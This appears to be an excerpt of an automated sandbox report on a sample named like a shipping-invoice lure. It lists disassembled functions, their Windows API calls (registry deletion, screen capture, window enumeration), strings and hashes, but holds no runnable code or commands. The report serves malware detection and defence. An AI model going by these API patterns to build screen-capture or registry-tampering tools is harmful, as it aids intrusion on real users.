Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: ecf7bf33f19c8727181582f7a1fc1acabdf2093612c6ed86d011053e0d604fa0
Instruction ID: eb69097575f49255b2fdd6a809ba57042cfc9ad38165ae5ecb00aa39181f9416
Opcode Fuzzy Hash: ecf7bf33f19c8727181582f7a1fc1acabdf2093612c6ed86d011053e0d604fa0
Instruction Fuzzy Hash: D2410C75600204BFDB119FA9DD88EAB7BB8EF99711F10407AF905EB260DB349D01CB68

Function 004714BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00471502
VariantCopy.OLEAUT32(?,?), ref: 0047150B
VariantClear.OLEAUT32(?), ref: 00471517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004715FB
VarR8FromDec.OLEAUT32(?,?), ref: 00471657
VariantInit.OLEAUT32(?), ref: 00471708
SysFreeString.OLEAUT32(?), ref: 0047178C
VariantClear.OLEAUT32(?), ref: 004717D8
VariantClear.OLEAUT32(?), ref: 004717E7
VariantInit.OLEAUT32(00000000), ref: 00471823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00471625
Default, xrefs: 004716AF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: ba598f90c12e18ab22f3f3a14ae79ad0d42ff63962e58bea57040a0ec4672516
Instruction ID: 0c605db627f9a6fcea8deb3e881c5d7ac84542bb8d3de78438d95bbb650700a1
Opcode Fuzzy Hash: ba598f90c12e18ab22f3f3a14ae79ad0d42ff63962e58bea57040a0ec4672516
Instruction Fuzzy Hash: 19D11371A00105EBDF089F69D885BF9B7B5BF44704F54C06BE40AAB2A0DB38DC46DB5A

Function 0048B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

Part of subcall function 0048C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0048B6AE,?,?), ref: 0048C9B5
Part of subcall function 0048C998: _wcslen.LIBCMT ref: 0048C9F1
Part of subcall function 0048C998: _wcslen.LIBCMT ref: 0048CA68
Part of subcall function 0048C998: _wcslen.LIBCMT ref: 0048CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0048B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0048B80A
RegCloseKey.ADVAPI32(?), ref: 0048B87E
RegCloseKey.ADVAPI32(?), ref: 0048B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0048B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0048B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0048B922
FreeLibrary.KERNEL32(00000000), ref: 0048B983
RegCloseKey.ADVAPI32(00000000), ref: 0048B994

Strings

RegDeleteKeyExW, xrefs: 0048B8FE
advapi32.dll, xrefs: 0048B8ED

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 75175d9ad90b8601f1d711508c6a1e4fc295dfd1eb731fceb7cbb3808139d2de
Instruction ID: dff2ae94d901b68dfbc339473ba99015738ca5bac0efe396a6ca95e9687f61ef
Opcode Fuzzy Hash: 75175d9ad90b8601f1d711508c6a1e4fc295dfd1eb731fceb7cbb3808139d2de
Instruction Fuzzy Hash: 11C16D70204201AFD710EF15C495F2ABBE5EF84318F14896EE59A5B3A2CB39EC45CBD6

Function 0048255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004825D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004825E8
CreateCompatibleDC.GDI32(?), ref: 004825F4
SelectObject.GDI32(00000000,?), ref: 00482601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0048266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004826AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004826D0
SelectObject.GDI32(?,?), ref: 004826D8
DeleteObject.GDI32(?), ref: 004826E1
DeleteDC.GDI32(?), ref: 004826E8
ReleaseDC.USER32(00000000,?), ref: 004826F3

Strings

(, xrefs: 0048268D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 80a922af6ff0b400d9b4d55868f74a63bb4a5b444080528099388fb43a20a8dd
Instruction ID: b8a9b27da65527d2ec4fd9924957b6d7e15a17d16c08fc6de10c4135e4ddce9e
Opcode Fuzzy Hash: 80a922af6ff0b400d9b4d55868f74a63bb4a5b444080528099388fb43a20a8dd
Instruction Fuzzy Hash: 44611475D00219EFCF04DFA4D985AAEBBB5FF48310F20852AE955A7250E374A941CFA8

Function 0043DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043DAA1

Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D659
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D66B
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D67D
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D68F
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D6A1
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D6B3
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D6C5
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D6D7
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D6E9
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D6FB
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D70D
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D71F
Part of subcall function 0043D63C: _free.LIBCMT ref: 0043D731

_free.LIBCMT ref: 0043DA96

Part of subcall function 004329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000), ref: 004329DE
Part of subcall function 004329C8: GetLastError.KERNEL32(00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000,00000000), ref: 004329F0

_free.LIBCMT ref: 0043DAB8
_free.LIBCMT ref: 0043DACD
_free.LIBCMT ref: 0043DAD8
_free.LIBCMT ref: 0043DAFA
_free.LIBCMT ref: 0043DB0D
_free.LIBCMT ref: 0043DB1B
_free.LIBCMT ref: 0043DB26
_free.LIBCMT ref: 0043DB5E
_free.LIBCMT ref: 0043DB65
_free.LIBCMT ref: 0043DB82
_free.LIBCMT ref: 0043DB9A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ba9ecef691faa970056ea1d3866dd1f1132379091b2b346f906a9454ef583009
Instruction ID: ffe76eae24fd8544d019f3284b9d6afa4b39dd2c00b4ff96bdf9c62132f8b44f
Opcode Fuzzy Hash: ba9ecef691faa970056ea1d3866dd1f1132379091b2b346f906a9454ef583009
Instruction Fuzzy Hash: 1F315CB1A042049FEB21AA3AF945B5BB7E9FF08314F15646FE449D7291DF78AC40C728

Function 0046365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0046369C
_wcslen.LIBCMT ref: 004636A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00463797
GetClassNameW.USER32(?,?,00000400), ref: 0046380C
GetDlgCtrlID.USER32(?), ref: 0046385D
GetWindowRect.USER32(?,?), ref: 00463882
GetParent.USER32(?), ref: 004638A0
ScreenToClient.USER32(00000000), ref: 004638A7
GetClassNameW.USER32(?,?,00000100), ref: 00463921
GetWindowTextW.USER32(?,?,00000400), ref: 0046395D

Strings

%s%u, xrefs: 00463734

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 10ae961581674d5cbcf1e214d19add7430943aa4d55c825e828419219232a29a
Instruction ID: 7b5c3b41c8cbfb7d3e55e91aba6d366648bd1860090b62885b86946cfe082944
Opcode Fuzzy Hash: 10ae961581674d5cbcf1e214d19add7430943aa4d55c825e828419219232a29a
Instruction Fuzzy Hash: FB91D671204246AFD714DF24C885BABF7A8FF44355F00452AF999C2290EB38EA49CB96

Function 00464954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00464994
GetWindowTextW.USER32(?,?,00000400), ref: 004649DA
_wcslen.LIBCMT ref: 004649EB
CharUpperBuffW.USER32(?,00000000), ref: 004649F7
_wcsstr.LIBVCRUNTIME ref: 00464A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00464A64
GetWindowTextW.USER32(?,?,00000400), ref: 00464A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00464AE6
GetClassNameW.USER32(?,?,00000400), ref: 00464B20
GetWindowRect.USER32(?,?), ref: 00464B8B

Strings

ThumbnailClass, xrefs: 00464A6F, 00464AF1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: b0eb2cffebd71530849ad0f8d6f1fc17b2ef59f95678408b0c2633a6fa0fed5b
Instruction ID: ef2d3bd4ef7e396348df645b57022939d607c9c9aefbfeb88a630890a8734fbd
Opcode Fuzzy Hash: b0eb2cffebd71530849ad0f8d6f1fc17b2ef59f95678408b0c2633a6fa0fed5b
Instruction Fuzzy Hash: 4991BD71104205AFDF04DF14C981BAB77A8EF84714F04846BFD859A296EB38ED45CBAA

Function 00498D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00419BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00419BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00498D5A
GetFocus.USER32 ref: 00498D6A
GetDlgCtrlID.USER32(00000000), ref: 00498D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00498E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00498ECF
GetMenuItemCount.USER32(?), ref: 00498EEC
GetMenuItemID.USER32(?,00000000), ref: 00498EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00498F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00498F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00498FA1

Strings

0, xrefs: 00498E9F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 0445e5d47e0633a50362685ed54f0853f7c9fe5740d42ff216a218705f9617e5
Instruction ID: f09423b894425bfc5704633e703d5dd2c6ec2960b86f90cba4647bf1a8ff03c3
Opcode Fuzzy Hash: 0445e5d47e0633a50362685ed54f0853f7c9fe5740d42ff216a218705f9617e5
Instruction Fuzzy Hash: D1818D71508311ABDF10CF28C884AAB7BE9BB8A754F14053FF985D7291DB38D901CB69

Function 0048CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0048CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0048CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0048CD48

Part of subcall function 0048CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0048CCAA
Part of subcall function 0048CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0048CCBD
Part of subcall function 0048CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0048CCCF
Part of subcall function 0048CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0048CD05
Part of subcall function 0048CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0048CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0048CCF3

Strings

RegDeleteKeyExW, xrefs: 0048CCC9
advapi32.dll, xrefs: 0048CCB8

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: dcd9112891bd2ee60c26572573abb16304940212726aceebbe92ece07dd225c5
Instruction ID: e86a5ad9e06cbea96041afa100c71b13dc6c8b19f8e223668f847576c6ff0ca9
Opcode Fuzzy Hash: dcd9112891bd2ee60c26572573abb16304940212726aceebbe92ece07dd225c5
Instruction Fuzzy Hash: 17317E71901128BBD720AB95DCC8EFFBBBCEF15740F000576A905E3240D6389A459BB8

Function 0046E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0046E6B4

Part of subcall function 0041E551: timeGetTime.WINMM(?,?,0046E6D4), ref: 0041E555

Sleep.KERNEL32(0000000A), ref: 0046E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0046E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0046E727
SetActiveWindow.USER32 ref: 0046E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0046E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0046E773
Sleep.KERNEL32(000000FA), ref: 0046E77E
IsWindow.USER32 ref: 0046E78A
EndDialog.USER32(00000000), ref: 0046E79B

Strings

BUTTON, xrefs: 0046E719

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 2fa67f0e142f612aeb7d58deafcfc03ae6a8127cb1edbb26ea12d7241a330f20
Instruction ID: bb1c645b88745d441f71c4c0e3317fcc2af5ab1b42d7041e6cab7d24ff849380
Opcode Fuzzy Hash: 2fa67f0e142f612aeb7d58deafcfc03ae6a8127cb1edbb26ea12d7241a330f20
Instruction Fuzzy Hash: 13219278241200BFEB015F66EDC9A263BE9EB75349F100437F801912B1EBB59C009B2E

Function 0046E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0046EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0046EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0046EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046EAA7

Strings

play PlayMe, xrefs: 0046EAA2
alias PlayMe, xrefs: 0046EA36
play PlayMe wait, xrefs: 0046EA91
close PlayMe, xrefs: 0046EA6E, 0046EA9B
open , xrefs: 0046EA0C
status PlayMe mode, xrefs: 0046EA58

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 3ea94977c5d223316f1155f6eff61fa39fea3f99cf92d776db3c494c09294a11
Instruction ID: 3692b6db05fd65ba027c1393d3da603a5f1682cfd2a4fe2854ed4949e6019a26
Opcode Fuzzy Hash: 3ea94977c5d223316f1155f6eff61fa39fea3f99cf92d776db3c494c09294a11
Instruction Fuzzy Hash: 611191B9A5021979D720A7A6DD4AFFF6ABCEFD1B04F10443F7801A20D1EA780D05C5B9

Function 00418BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00418BE8,?,00000000,?,?,?,?,00418BBA,00000000,?), ref: 00418FC5

DestroyWindow.USER32(?), ref: 00418C81
KillTimer.USER32(00000000,?,?,?,?,00418BBA,00000000,?), ref: 00418D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00456973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00418BBA,00000000,?), ref: 004569A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00418BBA,00000000,?), ref: 004569B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00418BBA,00000000), ref: 004569D4
DeleteObject.GDI32(00000000), ref: 004569E6

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: fbedbd1a7937270782ab1f8e2379ddec0a405b1dff3a68fadf911eade46e8b87
Instruction ID: 904443176f2e0c5aabccd5091ed5999ad562dca2c220c71f3dfeb9455a1b2caf
Opcode Fuzzy Hash: fbedbd1a7937270782ab1f8e2379ddec0a405b1dff3a68fadf911eade46e8b87
Instruction Fuzzy Hash: 9B618770502600EFCB219F14D958BAAB7F2FB50316F50452FE8429BA60CB39ACC5CB9D

Function 00419838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00419944: GetWindowLongW.USER32(?,000000EB), ref: 00419952

GetSysColor.USER32(0000000F), ref: 00419862

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 62751d272673b0821f713b73e41fe23e6aa4ecf6cc85e1f49b590694757af1f2
Instruction ID: 61c94829c2f462e06b9a30ff81eafb122e759f6e81981193f23f48934df35d16
Opcode Fuzzy Hash: 62751d272673b0821f713b73e41fe23e6aa4ecf6cc85e1f49b590694757af1f2
Instruction Fuzzy Hash: 2041E731104644AFDB206F389C95BFA37A5FB16331F144627F9A2872E2D7349C86DB19

Function 004696E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0044F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00469717
LoadStringW.USER32(00000000,?,0044F7F8,00000001), ref: 00469720

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0044F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00469742
LoadStringW.USER32(00000000,?,0044F7F8,00000001), ref: 00469745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00469866

Strings

Line %d (File "%s"):, xrefs: 0046978F
^ ERROR, xrefs: 004697FB
%s (%d) : ==> %s: %s %s, xrefs: 0046984A
Line %d:, xrefs: 004697A0
Error: , xrefs: 0046981D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
